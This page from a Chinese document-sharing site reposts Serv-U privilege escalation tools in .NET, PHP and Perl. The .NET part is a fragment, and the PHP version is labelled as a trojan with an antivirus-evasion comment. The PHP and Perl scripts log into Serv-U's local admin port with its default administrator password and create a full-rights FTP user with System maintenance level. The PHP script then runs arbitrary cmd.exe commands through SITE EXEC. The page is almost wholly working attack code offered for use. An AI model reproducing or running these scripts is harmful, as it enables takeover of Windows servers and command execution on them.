C.net/Perl/PHP 三个版本的 ServU提权源码程序

2024-04-16

C.net/Perl/PHP 三个版本的 ServU提权源码程序(精选1篇)

篇1:C.net/Perl/PHP 三个版本的 ServU提权源码程序

1..NET版本Serv-U提权程序

<%@ Page Language=“VB” Debug=“true” %>

<%@ import Namespace=“System.Net.Sockets” %>

from Serv-U 2

admin by lake2

Name

LocalAdministrator

PWD

#l@$ak#.lk;0@P

Port

43958

cmd

2.PHP版sevru提权木马

/**

注释免杀版本

**/

//

//Codez begin

//

//判断magic_quotes_gpc的值

if (get_magic_quotes_gpc) {

$_GET = stripslashes_array($_GET);

}

//变量初始化

$addr = ’0.0.0.0’;

$ftpport = 21;

$adminport = 43958;

$adminuser = ’LocalAdministrator’;

$adminpass = ’#l@$ak#.lk;0@P’;

$user = ’wofeiwo’;

$password = ’wrsky’;

$homedir = ’C:’;

$dir = ’C:WINNTSystem32’;

//有改变则赋值

if ($_GET){

$addr = $_GET[’addr’] ;

$ftpport = $_GET[’ftpport’] ;

$adminport = $_GET[’adminport’] ;

$adminuser = $_GET[’adminuser’] ;

$adminpass = $_GET[’adminpass’] ;

$user = $_GET[’user’] ;

$password = $_GET[’password’] ;

$homedir = $_GET[’homedir’] ;

if ($_GET[’dir’]){

$dir = $_GET[’dir’] ;

}

}

?>

-==-

Serv-U All Version本地提升权限Exp10it Ver 1.5

添加Serv-U用户部分

主机IP:

主机Ftp端口:

主机Ftp管理端口:

主机Ftp管理用户:

主机Ftp管理密码:

添加的用户名:

添加的用户名密码:

用户主目录(别忘了写“”):

命令回显:

//添加用户

if ($_GET[’action’]==“up”){

up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);

}

?>

执行命令部分

主机Ftp端口:

用户名:

用户名密码:

系统路径(别忘了写“”):

执行的命令:

命令回显:

//执行命令

if ($_GET[’action’]==“execute”){

ftpcmd($ftpport,$user,$password,$dir,$_GET[’cmd’]);

}

?>

Copycenter (C) 我非我 All centers Reserved.

//添加用户主函数定义

function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){

$fp = fsockopen (“127.0.0.1”, $adminport, $errno, $errstr, 8);

if (!$fp) {

echo “$errstr ($errno)

”;

} else {

fputs ($fp, “USER ”.$adminuser.“ ”);

sleep (1);

fputs ($fp, “PASS ”.$adminpass.“ ”);

sleep (1);

fputs ($fp, “SITE MAINTENANCE ”);

sleep (1);

fputs ($fp, “-SETUSERSETUP ”);

fputs ($fp, “-IP=”.$addr.“ ”);

fputs ($fp, “-PortNo=”.$ftpport.“ ”);

fputs ($fp, “-User=”.$user.“ ”);

fputs ($fp, “-Password=”.$password.“ ”);

fputs ($fp, “-HomeDir=”.$homedir.“ ”);

fputs ($fp, “-LoginMesFile= ”);

fputs ($fp, “-Disable=0 ”);

fputs ($fp, “-RelPaths=0 ”);

fputs ($fp, “-NeedSecure=0 ”);

fputs ($fp, “-HideHidden=0 ”);

fputs ($fp, “-AlwaysAllowLogin=0 ”);

fputs ($fp, “-ChangePassword=1 ”);

fputs ($fp, “-QuotaEnable=0 ”);

fputs ($fp, “-MaxUsersLoginPerIP=-1 ”);

fputs ($fp, “-SpeedLimitUp=-1 ”);

fputs ($fp, “-SpeedLimitDown=-1 ”);

fputs ($fp, “-MaxNrUsers=-1 ”);

fputs ($fp, “-IdleTimeOut=600 ”);

fputs ($fp, “-SessionTimeOut=-1 ”);

fputs ($fp, “-Expire=0 ”);

fputs ($fp, “-RatioUp=1 ”);

fputs ($fp, “-RatioDown=1 ”);

fputs ($fp, “-RatiosCredit=0 ”);

fputs ($fp, “-QuotaCurrent=0 ”);

fputs ($fp, “-QuotaMaximum=0 ”);

fputs ($fp, “-Maintenance=System ”);

fputs ($fp, “-PasswordType=Regular ”);

fputs ($fp, “-Ratios=None ”);

fputs ($fp, “ Access=”.$homedir.“|RWAMELCDP ”);

fputs ($fp, “QUIT ”);

sleep (1);

while (!feof($fp)) {

echo fgets ($fp,128);

}

}

}

//执行命令主函数定义

function ftpcmd($ftpport,$user,$password,$dir,$cmd){

$conn_id = fsockopen (“127.0.0.1”, $ftpport, $errno, $errstr, 8);

if (!$conn_id) {

echo “$errstr ($errno)

”;

} else {

fputs ($conn_id, “USER ”.$user.“ ”);

sleep (1);

fputs ($conn_id, “PASS ”.$password.“ ”);

sleep (1);

fputs ($conn_id, “SITE EXEC ”.$dir.“cmd.exe /c ”.$cmd.“ ”);

fputs ($conn_id, “QUIT ”);

sleep (1);

while (!feof($conn_id)) {

echo fgets ($conn_id,128);

}

fclose($conn_id);

}

}

//去除转义字符

function stripslashes_array(&$array) {

while (list($key,$var) = each($array)) {

if ($key != ’argc’ && $key != ’argv’ && (strtoupper($key) != $key || ’’.intval($key) == “$key”)) {

if (is_string($var)) {

$array[$key] = stripslashes($var);

}

if (is_array($var)) {

$array[$key] = stripslashes_array($var);

}

}

}

return $array;

}

?>

3.Perl版本的serv-U提权程序

#!/usr/bin/perl

use I:Socket;

binmode(STDOUT);

syswrite(STDOUT, “Content-type: text/html ”, 27);

$addr = “127.0.0.1”;

$ftpport = 21;

$adminport = 43958;

$adminuser = “LocalAdministrator”;

$adminpass = ’#l@$ak#.lk;0@P’;

$user = “Andyower”;

$password = “haika”;

$homedir = ’C:’;

$dir = ’C:WINNTSystem32’;

use I:Socket::INET;

$sock = I:Socket::INET->new(“127.0.0.1:$adminport”) || die “fail”;

print “Andyower制作

”;

print $sock “USER $adminuser ”;

sleep (1);

print $sock “PASS $adminpass ”;

sleep(1);

print $sock “SITE MAINTENANCE ”;

sleep(1);

print $sock “-SETUSERSETUP ”;

print $sock “-IP=”.$addr.“ ”;

print $sock “-PortNo=”.$ftpport.“ ”;

print $sock “-User=”.$user.“ ”;

print $sock “-Password=”.$password.“ ”;

print $sock “-HomeDir=”.$homedir.“ ”;

print $sock “-LoginMesFile= ”;

print $sock “-Disable=0 ”;

print $sock “-RelPaths=0 ”;

print $sock “-NeedSecure=0 ”;

print $sock “-HideHidden=0 ”;

print $sock “-AlwaysAllowLogin=0 ”;

print $sock “-ChangePassword=1 ”;

print $sock “-QuotaEnable=0 ”;

print $sock “-MaxUsersLoginPerIP=-1 ”;

print $sock “-SpeedLimitUp=-1 ”;

print $sock “-SpeedLimitDown=-1 ”;

print $sock “-MaxNrUsers=-1 ”;

print $sock “-IdleTimeOut=600 ”;

print $sock “-SessionTimeOut=-1 ”;

print $sock “-Expire=0 ”;

print $sock “-RatioUp=1 ”;

print $sock “-RatioDown=1 ”;

print $sock “-RatiosCredit=0 ”;

print $sock “-QuotaCurrent=0 ”;

print $sock “-QuotaMaximum=0 ”;

print $sock “-Maintenance=System ”;

print $sock “-PasswordType=Regular ”;

print $sock “-Ratios=None ”;

print $sock “ Access=”.$homedir.“|RWAMELCDP ”;

print $sock “QUIT ”;

@ret=<$sock>;

print “@ret”;

close(STDERR);

close(STDOUT);

exit;

本文来自 360文秘网(www.360wenmi.com),转载请保留网址和出处

【C.net/Perl/PHP 三个版本的 ServU提权源码程序】相关文章:

三个体系程序文件04-21

论团队精神——三个皮匠和三个和尚的故事04-30

三个的用法范文05-21

三个孩子的故事04-27

文化育人的三个步骤05-22

黄金投资的三个问题05-26

民谣《三个月亮》的歌词04-08

三个代表的论文04-15

诗歌的三个维度范文06-15

三个自信的理解范文06-15

>> 查看更多相关文档

上一篇:幼儿园家长开放日总方案下一篇:大学生党员个人自评报告

本站热搜

资料大全ABCDEFGHIJKLMNOPQRSTUVWXYZ0-9
网站声明|帮助中心|帮助中心|网站地图

360文秘网 360wenmi.com 赣ICP备2021006248号-5